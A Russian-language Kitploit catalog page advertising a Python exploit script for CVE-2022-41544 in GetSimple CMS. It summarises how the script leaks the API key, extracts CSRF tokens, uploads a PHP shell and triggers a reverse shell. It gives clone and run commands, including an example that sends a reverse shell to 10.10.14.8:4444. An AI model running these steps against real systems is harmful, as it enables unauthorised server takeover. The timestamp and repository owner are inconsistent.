Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-41544 — Скрипт эксплойта на Python для CVE-2022-41544 в GetSimple CMS. Автоматизирует утечку ключей API, извлечение CSRF-токенов, загрузку PHP-шелла и запуск reverse shell для пентеста. | Kitploit
Инструменты/GitHubGitHub/h3x0v3rl0rd/cve-2022-41544
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийТестирование на Проникновение
GitHubh3x0v3rl0rd/cve-2022-41544

CVE-2022-41544

Скрипт эксплойта на Python для CVE-2022-41544 в GetSimple CMS. Автоматизирует утечку ключей API, извлечение CSRF-токенов, загрузку PHP-шелла и запуск reverse shell для пентеста.

Репозиторий
31 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-41544 Эксплойт-скрипт

Этот репозиторий содержит скрипт для эксплуатации уязвимости CVE-2022-41544 в GetSimple CMS. Скрипт выполняет несколько шагов: проверяет наличие уязвимостей, извлекает ключи API, устанавливает cookies, получает CSRF-токены, загружает оболочку и запускает её.

Изменения и улучшения

  1. Обработка предупреждений об устаревании: Удалён импорт устаревшего модуля telnetlib, так как он не был необходим для работы скрипта.
  2. Улучшенная обработка ошибок: Добавлена более надёжная обработка ошибок для HTTP-запросов и разбора XML.
  3. Улучшенная обратная связь: Для каждого шага добавлены подробные сообщения, помогающие пользователю понять ход выполнения скрипта и возникшие проблемы.
  4. Проверка ввода: Обеспечена проверка пользовательского ввода для цели, пути и учётных данных.
  5. Документация и комментарии: Добавлены комментарии и документация для улучшения читаемости и удобства использования кода.

Использование

  1. Клонировать репозиторий:

    root@kitploit:~
    git clone https://github.com/n3rdyn3xus/CVE-2022-41544.git
    cd CVE-2022-41544
    
  2. Установить зависимости: Убедитесь, что у вас установлен Python 3 и библиотека .

requests
root@kitploit:~
pip3 install requests
  • Запустить скрипт:

    root@kitploit:~
    python3 CVE-2022-41544.py <target> <path> <ip:port> <username>
    
    • <target>: Целевой домен или IP-адрес.
    • <path>: Путь к установке GetSimple CMS.
    • <ip:port>: IP-адрес и порт для обратной оболочки.
    • <username>: Имя администратора GetSimple CMS.

    Пример:

    root@kitploit:~
    python3 CVE-2022-41544.py 10.129.42.249 /CMS 10.10.14.8:4444 admin
    
  • image

    image

    Обзор скрипта

    Функции

    • print_the_banner(): Отображает стилизованный баннер с использованием ASCII-арта.
    • get_version(target, path): Проверяет, является ли целевая версия GetSimple CMS уязвимой.
    • api_leak(target, path): Пытается получить ключ API из файла авторизации XML.
    • set_cookies(username, version, apikey): Устанавливает cookies, необходимые для последующих запросов, на основе полученного ключа API.
    • get_csrf_token(target, path, headers): Извлекает CSRF-токен, необходимый для загрузки оболочки.
    • upload_shell(target, path, headers, nonce, shell_content): Загружает PHP-оболочку на целевой сервер.
    • shell_trigger(target, path): Запускает загруженную оболочку для установки обратного соединения.

    Основная функция

    Функция main() координирует весь процесс, последовательно вызывая вышеуказанные функции для эксплуатации уязвимости CVE-2022-41544.

    Автор

    Этот скрипт разработал h3x0v3rl0rd.

    Отказ от ответственности

    Этот скрипт предоставлен только в образовательных целях. Несанкционированный доступ к системам незаконен и неэтичен. Используйте этот скрипт ответственно и только на системах, на которые у вас есть явное разрешение на тестирование.

    Лицензия

    Этот проект лицензирован по лицензии MIT — подробности см. в файле LICENSE.

    Скачать инструмент